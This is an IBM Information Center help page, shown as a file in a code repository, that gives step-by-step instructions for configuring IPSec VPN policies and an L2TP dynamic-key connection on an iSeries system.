friedkiwi/ibm-information-center
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
8826eae394
ibm-information-center/dist/eclipse/plugins/i5OS.ic.rzaja_5.4.0.1/rzajaconfigurevpnoniseriesa3.htm

161 lines
13 KiB
HTML
Raw Blame History

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xml:lang="en-us">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="security" content="public" />
<meta name="Robots" content="index,follow" />
<meta http-equiv="PICS-Label" content='(PICS-1.1 "http://www.icra.org/ratingsv02.html" l gen true r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true r (n 0 s 0 v 0 l 0) "http://www.classify.org/safesurf/" l gen true r (SS~~000 1))' />
<meta name="DC.Type" content="task" />
<meta name="DC.Title" content="Configure VPN on iSeries-A" />
<meta name="DC.Relation" scheme="URI" content="rzajaremoteuser.htm" />
<meta name="DC.Relation" scheme="URI" content="rzajaconfigureapppconnection.htm" />
<meta name="copyright" content="(C) Copyright IBM Corporation 2000, 2006" />
<meta name="DC.Rights.Owner" content="(C) Copyright IBM Corporation 2000, 2006" />
<meta name="DC.Format" content="XHTML" />
<meta name="DC.Identifier" content="rzajaconfigurevpnoniseriesa3" />
<meta name="DC.Language" content="en-us" />
<!-- All rights reserved. Licensed Materials Property of IBM -->
<!-- US Government Users Restricted Rights -->
<!-- Use, duplication or disclosure restricted by -->
<!-- GSA ADP Schedule Contract with IBM Corp. -->
<link rel="stylesheet" type="text/css" href="./ibmdita.css" />
<link rel="stylesheet" type="text/css" href="./ic.css" />
<title>Configure VPN on iSeries-A</title>
</head>
<body id="rzajaconfigurevpnoniseriesa3"><a name="rzajaconfigurevpnoniseriesa3"><!-- --></a>
<!-- Java sync-link --><script language="Javascript" src="../rzahg/synch.js" type="text/javascript"></script>
<h1 class="topictitle1">Configure VPN on iSeries-A</h1>
<div><div class="section"><p>Follow these steps to configure VPN on iSeries-A:</p>
</div>
<ol><li><span><span class="uicontrol">Configure the Internet Key Exchange policy</span></span><ol type="a"><li class="substepexpand"><span>In <span class="keyword">iSeries™ Navigator</span>,
expand iSeries-A<span class="menucascade"><span class="uicontrol"></span> &gt; <span class="uicontrol">Network</span> &gt; <span class="uicontrol">IP Policies</span> &gt; <span class="uicontrol">Virtual Private Networking</span> &gt; <span class="uicontrol">IP Security Policies</span></span>.</span> </li>
<li class="substepexpand"><span>Right-click <span class="uicontrol">Internet Key Exchange Policies</span> and
select <span class="uicontrol">New Internet Key Exchange Policy</span>.</span></li>
<li class="substepexpand"><span>On the <span class="uicontrol">Remote Server</span> page, select <span class="uicontrol">Version
4 IP address</span> as the identifier type and then enter <samp class="codeph">205.13.237.6</samp> in
the <span class="uicontrol">IP address</span> field.</span></li>
<li class="substepexpand"><span>On the <span class="uicontrol">Associations</span> page, select <span class="uicontrol">Preshared
key</span> to indicate that this connection uses a preshared key to authenticate
this policy.</span></li>
<li class="substepexpand"><span>Enter the preshared key in the <span class="uicontrol">Key</span> field.
Treat your preshared key like a password.</span></li>
<li class="substepexpand"><span>Select <span class="uicontrol">Key Identifier</span> for the local key
server identifier type, and then enter the key identifier in the <span class="uicontrol">Identifier</span> field.
For example, <samp class="codeph">thisisthekeyid</samp>. Remember that the local key
server has a dynamically assigned IP address which is impossible to know in
advance. iSeries-B uses this identifier to identify the iSeries-A when iSeries-A
initiates a connection.</span></li>
<li class="substepexpand"><span>On the <span class="uicontrol">Transforms</span> page, click <span class="uicontrol">Add</span> to
add the transforms that iSeries-A proposes to iSeries-B for key protection
and to specify whether the IKE policy uses identity protection when initiating
phase 1 negotiations.</span></li>
<li class="substepexpand"><span>On the <span class="uicontrol">IKE Policy Transform</span> page, select <span class="uicontrol">Preshared
key</span> for your authentication method, <span class="uicontrol">SHA</span> for
your hash algorithm, and <span class="uicontrol">3DES-CBC</span> for your encryption
algorithm. Accept the default values for Diffie-Hellman group and Expire IKE
keys after.</span></li>
<li class="substepexpand"><span>Click <span class="uicontrol">OK</span> to return to the <span class="uicontrol">Transforms</span> page.</span></li>
<li class="substepexpand"><span>Select <span class="uicontrol">IKE aggressive mode negotiation (no identity
protection).</span></span> <div class="note"><span class="notetitle">Note:</span> If you use preshared keys and aggressive
mode negotiation together in your configuration, select obscure passwords
that are unlikely to be cracked in attacks that scan the dictionary. It is
also recommended you periodically change your passwords.</div>
</li>
<li class="substepexpand"><span>Click <span class="uicontrol">OK</span> to save your configurations.</span></li>
</ol>
</li>
<li><span><span class="uicontrol">Configure the data policy</span></span><ol type="a"><li class="substepexpand"><span>From the VPN interface, right-click <span class="uicontrol">Data policies</span> and
select <span class="uicontrol">New Data Policy</span></span> </li>
<li class="substepexpand"><span>On the <span class="uicontrol">General</span> page, specify the name
of the data policy. For example, <samp class="codeph">l2tpremoteuser</samp></span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Proposals</span> page. A proposal
is a collection of protocols that the initiating and responding key servers
use to establish a dynamic connection between two endpoints. You can use a
single data policy in several connection objects. However, not all remote
VPN key servers necessarily have the same data policy properties. Therefore,
you can add several proposals to one data policy. When establishing a VPN
connection to a remote key server, there must be at least one matching proposal
in the data policy of the initiator and the responder.</span></li>
<li class="substepexpand"><span>Click <span class="uicontrol">Add</span> to add a data policy transform</span></li>
<li class="substepexpand"><span>Select <span class="uicontrol">Transport</span> for the encapsulation
mode.</span></li>
<li class="substepexpand"><span>Click <span class="uicontrol">OK</span> to return to the <span class="uicontrol">Transforms</span> page.</span></li>
<li class="substepexpand"><span>Specify a key expiration value.</span></li>
<li class="substepexpand"><span>Click <span class="uicontrol">OK</span> to save your new data policy.</span></li>
</ol>
</li>
<li><span><span class="uicontrol">Configure the dynamic-key group</span></span><ol type="a"><li class="substepexpand"><span>From the VPN interface, expand <span class="uicontrol">Secure Connections</span>.</span> </li>
<li class="substepexpand"><span>Right-click <span class="uicontrol">By Group</span> and select <span class="uicontrol">New
Dynamic-Key Group</span>.</span></li>
<li class="substepexpand"><span>On the <span class="uicontrol">General</span> page, specify a name for
the group. For example, <samp class="codeph">l2tptocorp</samp>.</span></li>
<li class="substepexpand"><span>Select <span class="uicontrol">Protects a locally initiated L2TP tunnel</span>.</span></li>
<li class="substepexpand"><span>For system role, select <span class="uicontrol">Both systems are hosts</span>.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Policy</span> page. Select the data
policy you created in the step<span class="uicontrol">Configure the data policy</span>, <samp class="codeph">l2tpremoteuser</samp>,
from the <span class="uicontrol">Data policy</span> drop-down list.</span></li>
<li class="substepexpand"><span>Select <span class="uicontrol">Local system initiates connection</span> to
indicate that only iSeries-A can initiate connections with iSeries-B.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Connections</span> page. Select <span class="uicontrol">Generate
the following policy filter rule for this group</span>. Click <span class="uicontrol">Edit</span> to
define the parameters of the policy filter.</span></li>
<li class="substepexpand"><span>On the <span class="uicontrol">Policy Filter- Local Addresses</span> page,
select <span class="uicontrol">Key Identifier</span> for the identifier type.</span></li>
<li class="substepexpand"><span>For the identifier, select the key identifier, <samp class="codeph">thisisthekeyid</samp>,
that you defined in the IKE policy.</span></li>
<li class="substepexpand"><span>Go the <span class="uicontrol">Policy Filter - Remote Addresses</span> page.
Select <span class="uicontrol">IP version 4 address</span> from the <span class="uicontrol">Identifier
type</span> drop-down list.</span></li>
<li class="substepexpand"><span>Enter <samp class="codeph">205.13.237.6</samp> in the <span class="uicontrol">Identifier</span> field.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Policy Filter - Services</span> page.
Enter <samp class="codeph">1701</samp> in the <span class="uicontrol">Local Port</span> and <span class="uicontrol">Remote
Port</span> fields. Port 1701 is the well-known port for L2TP.</span></li>
<li class="substepexpand"><span>Select <span class="uicontrol">UDP</span> from the <span class="uicontrol">Protocol</span> drop-down
list.</span></li>
<li class="substepexpand"><span>Click <span class="uicontrol">OK</span> to return to the <span class="uicontrol">Connections</span> page.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Interfaces</span> page. Select any
line or PPP profile to which this group will apply. You have not created the
PPP profile for this group yet. After you do so, you will need to edit the
properties of this group so that the group applies to the PPP profile you
create in the next step.</span></li>
<li class="substepexpand"><span>Click <span class="uicontrol">OK</span> to create the dynamic-key group,
l2tptocorp.</span></li>
</ol>
</li>
<li><span><span class="uicontrol">Configure the dynamic-key connection</span></span><ol type="a"><li class="substepexpand"><span>From the VPN interface, expand <span class="uicontrol">By Group</span>.
This displays a list of all dynamic-key groups you have configured on iSeries-A.</span> </li>
<li class="substepexpand"><span>Right-click <span class="uicontrol">l2tptocorp</span> and select <span class="uicontrol">New
Dynamic-Key Connection</span>.</span></li>
<li class="substepexpand"><span>On the <span class="uicontrol">General</span> page, specify an optional
description for the connection.</span></li>
<li class="substepexpand"><span>For the remote key server, select <span class="uicontrol">Version 4 IP address</span> for
the identifier type.</span></li>
<li class="substepexpand"><span>Select <samp class="codeph">205.13.237.6</samp> from the <span class="uicontrol">IP
address</span> drop-down list.</span></li>
<li class="substepexpand"><span>Deselect <span class="uicontrol">Start on-demand</span>.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Local Addresses</span> page. Select <span class="uicontrol">Key
identifier</span> for the identifier type and then select <samp class="codeph">thisisthekeyid</samp> from
the <span class="uicontrol">Identifier</span> drop-down list.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Remote Addresses</span> page. Select <span class="uicontrol">IP
version 4 address</span> for the identifier type.</span></li>
<li class="substepexpand"><span>Enter <samp class="codeph">205.13.237.6</samp> in the <span class="uicontrol">Identifier</span> field.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Services</span> page. Enter <samp class="codeph">1701</samp> in
the <span class="uicontrol">Local Port</span> and <span class="uicontrol">Remote Port</span> fields.
Port 1701 is the well-known port for L2TP.</span></li>
<li class="substepexpand"><span>Select <span class="uicontrol">UDP</span> from the <span class="uicontrol">Protocol</span> drop-down
list</span></li>
<li class="substepexpand"><span>Click <span class="uicontrol">OK</span> to create the dynamic-key connection.</span></li>
</ol>
</li>
</ol>
</div>
<div>
<div class="familylinks">
<div class="parentlink"><strong>Parent topic:</strong> <a href="rzajaremoteuser.htm" title="In this scenario, you learn how to setup a connection between a branch office host and a corporate office that uses L2TP protected by IPSec. The branch office has a dynamically assigned IP address, while the corporate office has a static, globally routable IP address.">Scenario: Protect an L2TP voluntary tunnel with IPSec</a></div>
<div class="nextlink"><strong>Next topic:</strong> <a href="rzajaconfigureapppconnection.htm">Configure a PPP connection profile and virtual line on iSeries-A</a></div>
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink